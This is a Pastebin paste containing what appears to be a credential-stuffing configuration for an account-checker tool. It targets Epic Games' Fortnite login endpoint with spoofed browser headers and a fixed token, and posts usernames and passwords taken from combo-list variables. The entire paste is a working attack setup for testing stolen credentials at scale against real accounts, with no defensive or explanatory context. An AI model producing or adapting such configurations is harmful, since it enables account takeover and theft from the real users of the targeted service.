Advertisement
Guest User

Untitled

a guest
Mar 30th, 2019
2,357
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.13 KB | None | 0 0
  1. Condition = Any
  2. Variable-1 = $Link = "https://accounts.epicgames.com/login/doCustomLogin"
  3. Link = $Link#
  4. isFTP = False
  5. HTTPVersion = 1.1
  6. FollowRedirect = False
  7. HTTPRequestMethod = POST
  8. Timeout = 10
  9. Variable-2 = $Heads = "Host: accounts.epicgames.com\nConnection: keep-alive\nContent-Length: 303\nAccept: */*\nOrigin: https://accounts.epicgames.com\nX-XSRF-TOKEN: 1e1740da8b994cf985d0a5b3f8d40afe\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTMLchr(Comma) like Gecko) Chrome/70.0.3538.77 Safari/537.36\nDNT: 1\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: https://accounts.epicgames.com/register/customized?loginSubheading=Sign+In&regSubheading=Register&productName=fortnite&lang=en_US&redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Ffortnite%2Fen-US%2Fbattle-pass%2Fseason-8&client_id=cd2b7c19c9734a2ab98dc251868d7724&noHostRedirect=true\nAccept-Encoding: gzipchr(Comma) deflatechr(Comma) br\nAccept-Language: en-USchr(Comma)en;q=0.9"
  10. Headers = $Heads#
  11. Variable-3 = $PostContent = combinetext("&epic_username=",$ComboUsername#,"&password=",$ComboPassword#,)
  12. PostContent = $PostContent#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement